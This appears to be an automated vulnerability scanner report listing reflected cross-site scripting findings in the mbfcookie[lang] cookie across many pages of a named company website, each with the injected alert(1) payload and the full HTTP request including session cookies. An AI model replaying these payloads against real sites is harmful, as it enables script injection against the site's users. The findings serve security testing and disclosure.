The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a91"><script>alert(1)</script>4a8a421a526 was submitted in the mbfcookie[lang] cookie. This input was echoed as 56a91\"><script>alert(1)</script>4a8a421a526 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cleanpipes HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en56a91"><script>alert(1)</script>4a8a421a526; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7177"><script>alert(1)</script>7651ebbe8e8 was submitted in the mbfcookie[lang] cookie. This input was echoed as a7177\"><script>alert(1)</script>7651ebbe8e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cn/865.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ena7177"><script>alert(1)</script>7651ebbe8e8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaab4"><script>alert(1)</script>d4517558dd0 was submitted in the mbfcookie[lang] cookie. This input was echoed as eaab4\"><script>alert(1)</script>d4517558dd0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /cn/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=eneaab4"><script>alert(1)</script>d4517558dd0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce73"><script>alert(1)</script>78e956c9366 was submitted in the mbfcookie[lang] cookie. This input was echoed as bce73\"><script>alert(1)</script>78e956c9366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /contact HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enbce73"><script>alert(1)</script>78e956c9366; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a345"><script>alert(1)</script>86899845244 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6a345\"><script>alert(1)</script>86899845244 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /de/5.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en6a345"><script>alert(1)</script>86899845244; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c53b"><script>alert(1)</script>f0a1f66cb8a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c53b\"><script>alert(1)</script>f0a1f66cb8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /de/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4c53b"><script>alert(1)</script>f0a1f66cb8a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b5ce"><script>alert(1)</script>46a86177217 was submitted in the mbfcookie[lang] cookie. This input was echoed as 5b5ce\"><script>alert(1)</script>46a86177217 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deeppacketinspection HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en5b5ce"><script>alert(1)</script>46a86177217; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ad11"><script>alert(1)</script>45c595a351a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4ad11\"><script>alert(1)</script>45c595a351a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/9.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4ad11"><script>alert(1)</script>45c595a351a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0de3"><script>alert(1)</script>c78fdd82d6c was submitted in the mbfcookie[lang] cookie. This input was echoed as e0de3\"><script>alert(1)</script>c78fdd82d6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene0de3"><script>alert(1)</script>c78fdd82d6c; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61438"><script>alert(1)</script>bf6eef2e4a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as 61438\"><script>alert(1)</script>bf6eef2e4a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-in-action-global-network-security-solution-resources.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en61438"><script>alert(1)</script>bf6eef2e4a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2791d"><script>alert(1)</script>a9d0e26d8e0 was submitted in the mbfcookie[lang] cookie. This input was echoed as 2791d\"><script>alert(1)</script>a9d0e26d8e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en2791d"><script>alert(1)</script>a9d0e26d8e0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d75d"><script>alert(1)</script>8224aca7549 was submitted in the mbfcookie[lang] cookie. This input was echoed as 3d75d\"><script>alert(1)</script>8224aca7549 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en3d75d"><script>alert(1)</script>8224aca7549; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e43ff"><script>alert(1)</script>b793ea52c1b was submitted in the mbfcookie[lang] cookie. This input was echoed as e43ff\"><script>alert(1)</script>b793ea52c1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/asert-arbor-security-engineering-response-team-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene43ff"><script>alert(1)</script>b793ea52c1b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ae"><script>alert(1)</script>00ecfe4a1d9 was submitted in the mbfcookie[lang] cookie. This input was echoed as 804ae\"><script>alert(1)</script>00ecfe4a1d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/atlas-global-network-threat-analysis-460.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en804ae"><script>alert(1)</script>00ecfe4a1d9; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a0c4"><script>alert(1)</script>58c339d6161 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1a0c4\"><script>alert(1)</script>58c339d6161 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/channel-partners-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en1a0c4"><script>alert(1)</script>58c339d6161; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b69"><script>alert(1)</script>158d46c471b was submitted in the mbfcookie[lang] cookie. This input was echoed as 90b69\"><script>alert(1)</script>158d46c471b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/com-5fcontent/view-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en90b69"><script>alert(1)</script>158d46c471b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0bb"><script>alert(1)</script>910074bfd64 was submitted in the mbfcookie[lang] cookie. This input was echoed as dc0bb\"><script>alert(1)</script>910074bfd64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/com-5fcontent/view-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=endc0bb"><script>alert(1)</script>910074bfd64; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa46"><script>alert(1)</script>3a748a1b21e was submitted in the mbfcookie[lang] cookie. This input was echoed as bfa46\"><script>alert(1)</script>3a748a1b21e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/contact-us-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enbfa46"><script>alert(1)</script>3a748a1b21e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d01"><script>alert(1)</script>e5f9fcae8fd was submitted in the mbfcookie[lang] cookie. This input was echoed as 56d01\"><script>alert(1)</script>e5f9fcae8fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/contact-us.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en56d01"><script>alert(1)</script>e5f9fcae8fd; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d93e"><script>alert(1)</script>110881cc17b was submitted in the mbfcookie[lang] cookie. This input was echoed as 5d93e\"><script>alert(1)</script>110881cc17b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/customer-solution-briefs.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en5d93e"><script>alert(1)</script>110881cc17b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d52"><script>alert(1)</script>29df373fe4f was submitted in the mbfcookie[lang] cookie. This input was echoed as 68d52\"><script>alert(1)</script>29df373fe4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en68d52"><script>alert(1)</script>29df373fe4f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e4"><script>alert(1)</script>c0ea527a00e was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e8e4\"><script>alert(1)</script>c0ea527a00e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/ipv6-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4e8e4"><script>alert(1)</script>c0ea527a00e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e5c7"><script>alert(1)</script>adb9c3d2480 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8e5c7\"><script>alert(1)</script>adb9c3d2480 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
